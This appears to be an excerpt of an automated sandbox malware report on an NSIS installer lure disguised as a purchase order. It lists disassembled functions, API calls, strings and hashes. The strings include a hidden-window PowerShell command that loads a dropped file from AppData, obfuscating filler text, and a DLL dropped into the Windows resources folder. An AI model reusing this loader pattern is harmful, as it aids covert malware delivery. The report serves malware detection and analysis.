                                                                                                • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                              • lstrcatW.KERNEL32(1033,0042D248), ref: 0040391A
                                                                                              • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,74DF3420), ref: 0040399A
                                                                                              • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 004039AD
                                                                                              • GetFileAttributesW.KERNEL32(: Completed), ref: 004039B8
                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender), ref: 00403A01
                                                                                                • Part of subcall function 00405F97: wsprintfW.USER32 ref: 00405FA4
                                                                                              • RegisterClassW.USER32(00433E80), ref: 00403A3E
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A56
                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A8B
                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403AC1
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403AED
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403AFA
                                                                                              • RegisterClassW.USER32(00433E80), ref: 00403B03
                                                                                              • DialogBoxParamW.USER32(?,00000000,00403C3C,00000000), ref: 00403B22
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                              • API String ID: 1975747703-1043627570
                                                                                              • Opcode ID: 4a446d5dbccae23a406b5103979b1ab82b0e2a86200a0986eae4ccf8c8be16fa
                                                                                              • Instruction ID: d3915a60f35156ec108069fee93d058ae2b4a83f87b830a45993cae0616e5fa0
                                                                                              • Opcode Fuzzy Hash: 4a446d5dbccae23a406b5103979b1ab82b0e2a86200a0986eae4ccf8c8be16fa
                                                                                              • Instruction Fuzzy Hash: EF61AA71640700AFD310AF659D46F2B3A6CEB84B4AF40113FF941B51E2DB7D6941CA2D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402DEE Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 182COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 361 402dee-402e3c GetTickCount GetModuleFileNameW call 405c25 364 402e48-402e76 call 406050 call 405a50 call 406050 GetFileSize 361->364 365 402e3e-402e43 361->365 373 402f63-402f71 call 402d8a 364->373 374 402e7c 364->374 366 403020-403024 365->366 381 402f73-402f76 373->381 382 402fc6-402fcb 373->382 376 402e81-402e98 374->376 378 402e9a 376->378 379 402e9c-402ea5 call 403242 376->379 378->379 386 402eab-402eb2 379->386 387 402fcd-402fd5 call 402d8a 379->387 384 402f78-402f90 call 403258 call 403242 381->384 385 402f9a-402fc4 GlobalAlloc call 403258 call 403027 381->385 382->366 384->382 407 402f92-402f98 384->407 385->382 412 402fd7-402fe8 385->412 391 402eb4-402ec8 call 405be0 386->391 392 402f2e-402f32 386->392 387->382 397 402f3c-402f42 391->397 410 402eca-402ed1 391->410 396 402f34-402f3b call 402d8a 392->396 392->397 396->397 403 402f51-402f5b 397->403 404 402f44-402f4e call 4064db 397->404 403->376 411 402f61 403->411 404->403 407->382 407->385 410->397 414 402ed3-402eda 410->414 411->373 415 402ff0-402ff5 412->415 416 402fea 412->416 414->397 418 402edc-402ee3 414->418 417 402ff6-402ffc 415->417 416->415 417->417 419 402ffe-403019 SetFilePointer call 405be0 417->419 418->397 420 402ee5-402eec 418->420 423 40301e 419->423 420->397 422 402eee-402f0e 420->422 422->382 424 402f14-402f18 422->424 423->366 425 402f20-402f28 424->425 426 402f1a-402f1e 424->426 425->397 427 402f2a-402f2c 425->427 426->411 426->425 427->397
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00402E1B
                                                                                                • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,00442800,80000000,00000003,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00405C29
                                                                                                • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00405C4B
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00442800,00442800,80000000,00000003,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00402E67
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5
                                                                                              • "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe", xrefs: 00402DEE
                                                                                              • soft, xrefs: 00402EDC
                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                                                              • Null, xrefs: 00402EE5
                                                                                              • Inst, xrefs: 00402ED3
                                                                                              • Error launching installer, xrefs: 00402E3E
                                                                                              • C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                              • String ID: "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                              • API String ID: 4283519449-2407772880
                                                                                              • Opcode ID: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
                                                                                              • Instruction ID: ecf8b1e823d6f98de7c15f593086dd5554d056807b59ad61161c89ef3c81dadd
                                                                                              • Opcode Fuzzy Hash: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
                                                                                              • Instruction Fuzzy Hash: AF51F671900216ABDB109F61DE89B9F7BB8FB54394F21413BF904B62C1C7B89D409B6C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401767 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 554 401767-40178c call 402bbf call 405a7b 559 401796-4017a8 call 406050 call 405a04 lstrcatW 554->559 560 40178e-401794 call 406050 554->560 565 4017ad-4017ae call 4062e4 559->565 560->565 569 4017b3-4017b7 565->569 570 4017b9-4017c3 call 406393 569->570 571 4017ea-4017ed 569->571 579 4017d5-4017e7 570->579 580 4017c5-4017d3 CompareFileTime 570->580 572 4017f5-401811 call 405c25 571->572 573 4017ef-4017f0 call 405c00 571->573 581 401813-401816 572->581 582 401885-4018ae call 4051af call 403027 572->582 573->572 579->571 580->579 583 401867-401871 call 4051af 581->583 584 401818-401856 call 406050 * 2 call 406072 call 406050 call 405795 581->584 596 4018b0-4018b4 582->596 597 4018b6-4018c2 SetFileTime 582->597 594 40187a-401880 583->594 584->569 616 40185c-40185d 584->616 599 402a55 594->599 596->597 598 4018c8-4018d3 FindCloseChangeNotification 596->598 597->598 601 4018d9-4018dc 598->601 602 402a4c-402a4f 598->602 604 402a57-402a5b 599->604 605 4018f1-4018f4 call 406072 601->605 606 4018de-4018ef call 406072 lstrcatW 601->606 602->599 612 4018f9-40228d call 405795 605->612 606->612 612->602 612->604 616->594 618 40185f-401860 616->618 618->583
                                                                                              APIs
                                                                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                                                                              • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursuspla,"powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursuspla,00000000,00000000,"powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursuspla,C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten,?,?,00000031), ref: 004017CD
                                                                                                • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Podning Setup,NSIS Error), ref: 0040605D
                                                                                                • Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                • Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B), ref: 0040520A
                                                                                                • Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                              • String ID: "powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursuspla$C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten$C:\Windows\resources\uncriticizables.dll
                                                                                              • API String ID: 1941528284-3164209308
                                                                                              • Opcode ID: c184a2106905ab0827f14b10fddaf5979f1bb1fc4cb028ac84f277b3ec7ab09a
                                                                                              • Instruction ID: fa226e2697354f8a36450ecb7523776f7f82d9f29d3b914395726c71c929f9d2
                                                                                              • Opcode Fuzzy Hash: c184a2106905ab0827f14b10fddaf5979f1bb1fc4cb028ac84f277b3ec7ab09a
                                                                                              • Instruction Fuzzy Hash: 37418471900514BADF11BBB5CC46EAF7679EF45328F20823BF522B10E1DB3C8A519A6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004051AF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 620 4051af-4051c4 621 4051ca-4051db 620->621 622 40527b-40527f 620->622 623 4051e6-4051f2 lstrlenW 621->623 624 4051dd-4051e1 call 406072 621->624 626 4051f4-405204 lstrlenW 623->626 627 40520f-405213 623->627 624->623 626->622 628 405206-40520a lstrcatW 626->628 629 405222-405226 627->629 630 405215-40521c SetWindowTextW 627->630 628->627 631 405228-40526a SendMessageW * 3 629->631 632 40526c-40526e 629->632 630->629 631->632 632->622 633 405270-405273 632->633 633->622
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(Completed,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                              • lstrlenW.KERNEL32(0040318B,Completed,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                              • lstrcatW.KERNEL32(Completed,0040318B), ref: 0040520A
                                                                                              • SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                              • String ID: Completed
                                                                                              • API String ID: 2531174081-3087654605
                                                                                              • Opcode ID: 00247a6464f5c3c901f3e71bb549cec16c26b63cf5655e6d63979758284adbde
                                                                                              • Instruction ID: 3abc69651b1b947d68a29ef5f67bb3ab151c750651a003a3f474b57aa403b91e
                                                                                              • Opcode Fuzzy Hash: 00247a6464f5c3c901f3e71bb549cec16c26b63cf5655e6d63979758284adbde
                                                                                              • Instruction Fuzzy Hash: E6216D71900518BACB119FA5DD85ECFBFB8EF45354F14807AF944B62A0C7798A50CF68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403027 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 634 403027-40303e 635 403040 634->635 636 403047-403050 634->636 635->636 637 403052 636->637 638 403059-40305e 636->638 637->638 639 403060-403069 call 403258 638->639 640 40306e-40307b call 403242 638->640 639->640 644 403230 640->644 645 403081-403085 640->645 646 403232-403233 644->646 647 4031db-4031dd 645->647 648 40308b-4030d4 GetTickCount 645->648 651 40323b-40323f 646->651 649 40321d-403220 647->649 650 4031df-4031e2 647->650 652 403238 648->652 653 4030da-4030e2 648->653 657 403222 649->657 658 403225-40322e call 403242 649->658 650->652 654 4031e4 650->654 652->651 655 4030e4 653->655 656 4030e7-4030f5 call 403242 653->656 660 4031e7-4031ed 654->660 655->656 656->644 668 4030fb-403104 656->668 657->658 658->644 666 403235 658->666 663 4031f1-4031ff call 403242 660->663 664 4031ef 660->664 663->644 671 403201-40320d call 405cd7 663->671 664->663 666->652 670 40310a-40312a call 406549 668->670 676 403130-403143 GetTickCount 670->676 677 4031d3-4031d5 670->677 678 4031d7-4031d9 671->678 679 40320f-403219 671->679 680 403145-40314d 676->680 681 40318e-403190 676->681 677->646 678->646 679->660 684 40321b 679->684 685 403155-403186 MulDiv wsprintfW call 4051af 680->685 686 40314f-403153 680->686 682 403192-403196 681->682 683 4031c7-4031cb 681->683 688 403198-40319f call 405cd7 682->688 689 4031ad-4031b8 682->689 683->653 690 4031d1 683->690 684->652 691 40318b 685->691 686->681 686->685 694 4031a4-4031a6 688->694 693 4031bb-4031bf 689->693 690->652 691->681 693->670 695 4031c5 693->695 694->678 696 4031a8-4031ab 694->696 695->652 696->693
                                                                                              APIs
                                                                                              Strings
                                                                                              • ... %d%%, xrefs: 0040316E
                                                                                              • cyclical canakin flebotomy subcandidness intervalhalveringernes noncelebration dicaryon compsothlypidae gastritissenjasigerens quadroons rubinens stemmeberettiget glimrede udkoksede,farvellets mesenteriolum statsskove gennemsgningerne frtidspensionisters inv, xrefs: 004030AB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick$wsprintf
                                                                                              • String ID: ... %d%%$cyclical canakin flebotomy subcandidness intervalhalveringernes noncelebration dicaryon compsothlypidae gastritissenjasigerens quadroons rubinens stemmeberettiget glimrede udkoksede,farvellets mesenteriolum statsskove gennemsgningerne frtidspensionisters inv
                                                                                              • API String ID: 551687249-3985824943
                                                                                              • Opcode ID: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
                                                                                              • Instruction ID: a151fef9e86e41fc3429002d146a23742bf049d8b35666da4da471479faf367b
                                                                                              • Opcode Fuzzy Hash: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
                                                                                              • Instruction Fuzzy Hash: F9517C71901219EBDB10CF65DA44BAE3BA8AF05766F10417BF815B72C0C7789A41CBAA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004063BA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 697 4063ba-4063da GetSystemDirectoryW 698 4063dc 697->698 699 4063de-4063e0 697->699 698->699 700 4063f1-4063f3 699->700 701 4063e2-4063eb 699->701 703 4063f4-406427 wsprintfW LoadLibraryExW 700->703 701->700 702 4063ed-4063ef 701->702 702->703
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
                                                                                              • wsprintfW.USER32 ref: 0040640C
                                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406420
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                              • API String ID: 2200240437-1946221925
                                                                                              • Opcode ID: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                                              • Instruction ID: 7b807a610878b0bc4ee9c08e82fc2c2c0a074289e2a27b7b834fb84ffe8ff7bb
                                                                                              • Opcode Fuzzy Hash: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                                              • Instruction Fuzzy Hash: 09F0F670500219A7DB10AB68ED0DF9B3A6CEB00304F50443AA946F10D1EBB8DA29CBE8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405C54 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 704 405c54-405c60 705 405c61-405c95 GetTickCount GetTempFileNameW 704->705 706 405ca4-405ca6 705->706 707 405c97-405c99 705->707 709 405c9e-405ca1 706->709 707->705 708 405c9b 707->708 708->709
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00405C72
                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405C8D
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C59
                                                                                              • "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe", xrefs: 00405C54
                                                                                              • nsa, xrefs: 00405C61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileNameTempTick
